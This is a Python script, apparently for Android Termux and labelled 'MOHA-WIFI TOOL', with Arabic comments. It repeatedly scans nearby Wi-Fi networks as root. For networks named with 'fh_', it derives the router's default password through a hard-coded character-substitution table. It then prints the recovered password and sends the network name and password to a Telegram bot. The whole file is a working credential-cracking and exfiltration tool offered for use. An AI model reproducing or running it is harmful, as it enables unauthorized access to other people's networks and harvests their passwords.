import os, subprocess, time, urllib.request

# --- ضع بياناتك هنا ---
TOKEN = "YOUR_BOT_TOKEN"
CHAT_ID = "YOUR_CHAT_ID"

# جدول التحويل (Mapping)
MAP = {'e':'1','d':'2','c':'3','b':'4','a':'5','9':'6','8':'7','f':'0'}

def send_tg(t):
    try:
        url = f"https://api.telegram.org/bot{TOKEN}/sendMessage?chat_id={CHAT_ID}&text={t}"
        urllib.request.urlopen(url)
    except: pass

def get_p(s):
    if "fh_" in s.lower():
        sub = s.split("fh_")[-1]
        res = "".join([MAP.get(c.lower(), c) for c in sub])
        return f"wlan{res}"
    return None

def main():
    os.system("clear")
    print("\033[1;32m   MOHA-WIFI TOOL (TERMUX) \n   -----------------------")
    hist = []
    while True:
        try:
            # مسح الشبكات (يحتاج روت ليعمل تلقائياً)
            out = subprocess.check_output("su -c 'iwlist wlan0 scan | grep ESSID'", shell=True).decode()
            for line in out.split('\n'):
                if "ESSID" in line:
                    name = line.split('"')[1]
                    if "fh_" in name.lower() and name not in hist:
                        pw = get_p(name)
                        print(f"[+] Found: {name} -> {pw}")
                        send_tg(f"🚀 Target: {name}%0A🔑 Pass: {pw}")
                        hist.append(name)
        except: pass
        time.sleep(10)

if __name__ == "__main__":
    main()
